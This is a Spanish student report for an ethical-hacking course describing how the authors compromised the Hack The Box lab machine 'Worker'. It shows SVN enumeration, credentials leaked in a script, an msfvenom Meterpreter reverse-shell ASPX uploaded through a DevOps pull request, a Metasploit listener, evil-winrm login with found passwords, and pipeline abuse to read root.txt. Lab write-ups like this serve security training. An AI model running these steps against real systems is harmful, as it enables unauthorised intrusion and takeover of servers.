Descarga la aplicación para disfrutar aún más
Vista previa del material en texto
Worker Curso: 6/1 TICS Semestre: 6TO Semestre Informe de evaluación de la maquina Periodo: 2020-1 Entorno Virtual Docente: ING. Ivan Coronel Asignatura: Ethical Hacking FACULTAD DE SISTEMAS Y TELECOMUNICACIONES Contenido 1. Tabla de control de documentos 3 2. Resumen 4 3. Metodología 5 4. Informe de evaluación 6 5. Resultados obtenidos 28 6. Conclusión y recomendación 30 7. Apéndice 30 8. Bibliografía 31 1. Tabla de control de documentos AUTORES FECHA DE ENTREGA PÁGINAS VERSIÓN ESTADO Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez 30/09/2020 4 1,0 Metodologías de Escaneos Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez 10/10/2020 9 1.1 Escaneos de Hack the box: Worker. Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez 13/10/2020 21 1.2 Resultado Final: Procedimiento y Solución 2. Resumen Descripción del proyecto La partica que realzaremos será en la paginas oficial de Hack the box la cual escogeremos una máquina para obtener los archivos user.txt y root.txt con la ayuda del sistema operativo Kali Linux esto será en un habiente virtual también utilizaremos Nmap y Metasloit framework para tener acceso a nuestra maquina ya previamente seleccionada con los cuales detallamos todos los puntos importante en este informe. Metas · Reconocimiento de la plataforma o maquina ya seleccionada, se le realizar el ingreso por su dirección ip para realizar un escaneo y obtener información. · Escaneo y búsqueda de los puertos abiertos en las cuales utilizaremos el comando nmap para obtener exploit y poder acceder a las maquinas. · Obtener acceso con la ejecución de los exploit encontrados y sus respectivos payload los cuales nos permitirán obtener las credenciales de los archivos user.txt y root.txt. Encontrar recuentos Hallazgos totales Obtuvimos 2 hallazgos importante que son los usuarios.txt y root.txt los cueles nos permitió tener acceso fechas Patada inicial Prueba activa 13/10/2020 Entrega de informes 3. Metodología Mediante una evaluación previa a nuestro objetivo Hack The Box controlada y que contiene máquinas virtuales que permite obtener con facilidad la dirección ip dando así una facilidad de escanear y obtener los puertos para posterior penetrar y obtener informaciones relevantes. Debido a la información proporcionada anterior evaluamos y decidimos por una aplicación que nos ayuda a obtener información de la misma como es Nmap una herramienta que nos permite navegar redes más aun para obtener host simple a través de paquetes IP; obteniendo información de una red disponible, servicios que utiliza con su versión en el momento, bajo qué sistema operativo esta creado y corre, firewall utilizado por la misma. Posterior a una conexión vpn para administrarlo desde consola de sistema operativo de Kali y evaluación oportuna de cada uno de pasos importantes para obtener lo requerido; uno de ellos es detectar los puertos abiertos e identificar si existen usuarios por defecto. Con la información de este paso se realizó la búsqueda de los exploit para acceder a las maquinas; mediante la ejecución de los exploit con los respectivos payload se procedió al ingreso en las maquinas objetivos para poder descubrir las credenciales de los archivos user.txt y root.txt. 4. Informe de evaluación En el siguiente informe se detalladle los hallazgos durante la penetración hacia la maquina Worker de la plataforma HACK THE BOX. La máquina Worker es un servidor web con sistema operativo Windows Server 2008 el cual cuenta con un sitio web de noticias el cual usa programas como: · Subversión: es una herramienta de control de versiones open source basada en un repositorio cuyo funcionamiento se asemeja enormemente al de un sistema de ficheros. Es software libre bajo una licencia de tipo Apache/BSD. Detalle: Conexión a la maquina mediante VPN, para permitir realizar el escaneo de los puertos del servidor mediante la herramienta nmap y la siguiente línea de comando: root@kali:/home/kali/Desktop/comandos # nmap -sV -O -sC -A -oN Worker.txt 10.10.10.203 Ilustración 1 Escaneo de nmap a la maquina worker En el puerto 3690 que se encuentra abierto se está ejecutando un servidor svnserve, el cual es parecido a un servidor de repositori como git. ENUMERACION Ingresamos nuestro navegador preferido y transcribimos la dirección ip dirigiendo el puerto 80 (10.10.10.203/80) nos presentara un servidor web determinado de IIS Ilustración 2 página oficial de worker SVN es un sistema de control de versiones usado para que varios desarrolladores puedan trabajar en un mismo proyecto en forma más o menos ordenada. Tiene una arquitectura cliente servidor con controles de concurrencia para cuando varios desarrolladores están trabajando en el mismo archivo y funciona más o menos así. En algún servidor se monta un repositorio SVN. (Autor) Installer subversion sudo apt-get install subversion Que instalará subversión y cualquier otro paquete del que dependa. Datos del paquete Paquete Subversion Versión 1.9.5-1 Mantenedor Peter Samuelson Descripción Sistema de sistema de control de versiones avanzado. Los sistemas de control de versiones permiten que muchas personas (que pueden estar distribuidas geográficamente) colaboren en un conjunto de archivos (código fuente, sitios web, etc.). Subversion comenzó con un paradigma CVS y es compatible con todas las características principales de CVS, pero ha evolucionado para admitir muchas características que los usuarios de CVS a menudo desearían tener. Ilustración 3 instalación de subversión Svn list: Enumere cada TARGET archivó y el contenido de cada TARGET directorio tal como existen en el repositorio. Si TARGET es una ruta de copia de trabajo, se utilizará la URL del repositorio correspondiente.. Con --verbose svn list muestra los siguientes campos para cada elemento: · Número de revisión de la última confirmación · Autor de la última confirmación · Si está bloqueado, la letra " O " (consulte la sección anterior sobre información de svn para obtener más detalles). · Tamaño (en bytes) · Fecha y hora de la última confirmación A continuación ejecutamos el comando root@kali:/home/kali/Desktop/comandos# svn list svn://10.10.10.203 Podemos observar que encontramos diferentes versiones la cual elegiremos la correcta verificamos verifiquemos git commit para obtener información. Podemos ver algunos archivos, dimension.worker.htb / y moved.txt las cuales vamos a exportamos. Ilustración 4 información del svn en Worker Seguimos y realizamos la exportación de ya lo anterior nombrado con el comando root@kali:/home/kali/Desktop/comandos# svn export svn://10.10.10.203/dimension.worker.htb/ El primer directorio (dimension.worker.htb) es solo un rabbithole como muchos otros subdominios que podemos encontrar con DNS fuzzing.Si encuentra otros archivos (como aspx shell), este es solo el archivo de otros usuarios. Ilustración 5 dimension.worker.htb Al revisar dimension.worker.htb/ son puro directorios y archivos en el que no existe información relevante. root@kali:/home/kali/Desktop/comandos# svn export svn://10.10.10.203/moved.txt Procedemos a leer lo que tiene el archivo txt con el comando. root@kali:/home/kali/Desktop/comandos# cat moved.txt Dentro del archivo se encontró un link abrimos el link con el navegador para ver que nos aparecerá. Ilustración 6 contenido de moved.txt No nos permite conectar así que agregamos en la ip y la dirección a nuestro host con el comando nano al directorio /etc/host root@kali:/home/kali# nano /etc/hosts Ilustración 7 GNU nano No dirigimos al link que encontramos el cual es: http://devops.worker.htb/ Ilustración 8 Worker.htb Digitamos la dirección en el navegador y nos pide las credenciales en el sitio utiliza RELAM básico, con autentificación NTLM debió a esta autentificación no permitirá la conexión de manera fácil. NTLM: NT LAN Manager conocido como NTLM fue el primero en Windows NT y es una mejora respectoal protocolo LM. A diferencia de las contraseñas LM, que usan el conjunto de caracteres ASCII, las de NTLM están basadas en el conjunto de caracteres Unicode, se reconocen las minúsculas y las mayúsculas, la longitud aumenta hasta 128 caracteres.. (juansa, 2008) A continuación utilizaremos nuevamente svn para realzar una revision con la copia del directorio dimension.worker.htb/ exportado anteriormente. root@kali:/home/kali/Desktop/comandos# svn checkout -r 2 svn://10.10.10.203 En la revision 2 se encontró un archivo deploy.ps1porcedemos a la lectura con el comando cat Ilustración 9 Credencial En el cual encontramos unas credenciales: $user = "nathen" $plain = "wendel98" Esta etapa vamos a realizar la exportación la cual no dirigiremos a la página de devops.workrt.htb e ingresaremos con las credenciales que encontramos anterior mente : http://devops.worker.htb/ Ilustración 10 Inicio de sección Nos mostrara la pagina principal Ilustración 11 Página Principal Una vez dentro de la página procedemos a buscar información relevante nos dirigimos a la ruta en el cual se permite la creación de una nueva sucursal. En la cual crearemos una nueva sucursal. http://devops.worker.htb/ekenas/SmartHotel360/_git/spectral/branches Ilustración 12 Nuevo branch Ahora cargaremos una shell aspx dentro del repositorio. asp shell: es un archivo que se ejecuta en servidores asp. Con este shell, puede piratear servidores fácilmente y navegar fácilmente en el servidor. Es uno de los mejores caparazones de áspid del mundo. El shell más utilizado es el shell aspx. Con la sencilla interfaz, puede superar cómodamente la seguridad de muchos servidores. root@kali:/home/kali/Desktop/comandos# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=4444 -f aspx -o htb12.aspx Crearemos un archivo htb.aspx con Metasloit Ilustración 13 Creación del asp shell Subimos el archivo creado Ilustración 14 achivo subido Creamos un pull request Ilustración 15 Create pull request Ilustración 16 Confirmamos la creación Ilustración 17 Aprobar Ilustración 18 completamos los requisitos Ilustración 19 correcto Nota : para poder acceder a esta direccion http://spectral.worker.htb/htb.aspx Es necesario agregarla en nuestro archivo hots en el directorio etc y tener abiero el meta exploit como oyente Abrimos el oyevte enm metasploit Ilustración 20 Metasploit NOTA: EL proceso debe realizarse de manera rápida debido a que la maquina Worker borra el shell y toca realizar de nuevo desde la creación del branch. Ilustración 21 sección use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.10.14.238 set LPORT 4444 run Ilustración 22 ejecucion del proceso No cerrar la página abierta porque después se cierra el proceso. Ilustración 23 archivos Hay tantos usuarios en él, pero solo robisl es útil porque es el único usuario remoto en la lista. Ilustración 24 usuario robisl robisl = wolves11 En la lista existe gran cantidad usuarios pero solo este usuario y sesta contraseña son los que nos permite conexión rectamente con evil-winrm. Ganar acceso en el nivel de usuario Instalar la herramienta evil-winrm Vil WinRM es el último shell de WinRM para hackear / pentesting. WinRM (Windows Remote Management) es la implementación de Microsoft del protocolo WS-Management. Un protocolo estándar basado en SOAP que permite que el hardware y los sistemas operativos de diferentes proveedores interoperen. Microsoft lo incluyó en sus sistemas operativos para facilitar la vida de los administradores de sistemas. Este programa se puede usar en cualquier servidor de Microsoft Windows con esta función habilitada (generalmente en el puerto 5985), por supuesto, solo si tiene credenciales y permisos para usarlo. Para poder instalar evil-winrm se necesita instalar ante las siguientes herramientas: root@kali:/home/kali/Desktop/comandos# gem install stringio root@kali:/home/kali/Desktop/comandos# gem install winrm root@kali:/home/kali/Desktop/comandos# gem install winrm-fs root@kali:/home/kali/Desktop/comandos# gem install colorize Ilustración 25 comando de instalación de evil-winrm Comando para la conexión remota root@kali:/home/kali/Desktop/comandos# evil-winrm -i 10.10.10.203 -u robisl -p wolves11 Ilustración 26 Establecemos conexión con evil-winrm Buscamos con los siguientes comando el user.txt *Evil-WinRM* PS C:\Users\robisl\Documents> cd .. *Evil-WinRM* PS C:\Users\robisl> ls *Evil-WinRM* PS C:\Users\robisl> cd Desktop *Evil-WinRM* PS C:\Users\robisl\Desktop> ls *Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt c07f8a776d7e59e78195c28df3cd8c8a Aquí encontramos el user.txt: c07f8a776d7e59e78195c28df3cd8c8a Ilustración 27 user.tx Escalar privilegios Nos dirigimos a http://devops.worker.htb para iniciar sesión con las credenciales obtenidas Usuario: robisl Password:wolves11 Ilustración 28 ingreso con las credenciales Ilustración 29 Ingreso Pipelines Pipeline: consiste en una cadena de elementos de procesamiento (procesos, subprocesos, corrutinas, funciones, etc.), dispuestos de manera que la salida de cada elemento sea la entrada del siguiente; el nombre es por analogía a una tubería física. Por lo general, se proporciona cierta cantidad de almacenamiento en búfer entre elementos consecutivos. Ilustración 30 Ilustración 31 Ilustración 32 Commando pool: 'Setup' steps: - script: type C:\Users\Administrator\Desktop\root.txt displayName: 'Run a one-line script' Haga clic en New Pipeline> Azure Repos Git> PartsUnlimited> Starter Pipeline .Será recibido con una ventana similar: (Autor, CTF Tricks, 2020) Ilustración 33 Haga clic en Guardar y ejecutar> seleccione Crear una nueva rama para esta confirmación e inicie una solicitud de extracción > Guardar y ejecutar. Espere de 5 a 10 minutos para que se construya y se ejecute. La máquina está muy retrasada y en algún momento te arrojaría un error incluso si hiciste todo bien. En ese caso, comience por crear una nueva tubería nuevamente. (Autor, CTF Tricks, 2020) Una vez finalizada la compilación, aparecerá una ventana similar. Ilustración 34 listado contraseña dentro del archivo root.txt Ilustración 35 archivo root.txt 5. Resultados obtenidos Ya obtenido todos los datos que requeríamos nos dirigimos a la página de hack the box y posterior se obtuvo. Contraseña dentro del archivo user.txt c07f8a776d7e59e78195c28df3cd8c8a cad5f466820843e89362a01a43458b45 Ilustración 36 Objetivo Worker Ilustración 37 Objetivo logrado Ilustración 38 LISTO: D 6. Conclusión y recomendación Como hemos visto en el transcurso del proceso de poder terminar esta práctica con éxitos debemos tomar en cuenta algunos puntos importantes que planteamos durante este proceso los cuales nos ayudaron con éxito pero cabe recalcar que al momento de poder avanzar encontrábamos algunas cosas en la cuales no teníamos conocimiento por lo que nos dirigimos a diferente fuentes. 7. Apéndice APÉNDICE A - CLASIFICACIÓN DE CRITERIOS A continuación se muestran los criterios de calificación de riesgo utilizados para clasificar este informe: Gravedad Descripción ALTO Permitir la escalabilidad de privilegio en la cual nos permitirá acceder credenciales robisl: wolves11. MEDIO Enumeración obtener acceso al puerto 3690 y su exploit adecuado a utilizar para así poder tener acceso a los repositorios encontrados y utilizar los adecuados. BAJO Explotación y Búsqueda de información con la ip de la máquina para tener una mayor un mayor entendimiento. Bibliografía Autor. (18 de agosto de 2020). CTF Tricks. Recuperado el 12 de Octubre de 2020, de HACK THE BOX - Trabajador 10.10.10.203: https://hacktheboxwriteups.blogspot.com/2020/08/nmap-scan-nmap-10.html?m=1 Autor. (s.f.). Lihuen 6. Recuperado el 12 de Octubre de 2020, de Cómo usar SVN: https://lihuen.linti.unlp.edu.ar/index.php/C%C3%B3mo_usar_SVN#:~:text=SVN%20es%20un%20sistema%20de,funciona%20m%C3%A1s%20o%20menos%20as%C3%AD. Installlion. (s.f.). Installlion.com. Recuperadoel 12 de octubre de 2020, de Instalar en pc subversion: https://installlion.com/kali/kali/main/s/subversion/install/index.html juansa. (26 de Diciembre de 2008). Windows Server. Recuperado el 2020 de Octubre de 2020, de Seguridad: Autenticarse, NTLM, NTLMv2, Kerberos: https://blogs.msmvps.com/juansa/blog/2008/12/26/seguridad-autenticarse-ntlm-ntlmv2-kerberos/ Sussman, C., Pilato, M., & Fitzpatrick, B. (2019). Control de versiones Open Source de siguiente generación. Recuperado el 12 de octubre de 2020, de Subversion : http://svnbook.red-bean.com/en/1.7/svn.ref.svn.c.list.html
Compartir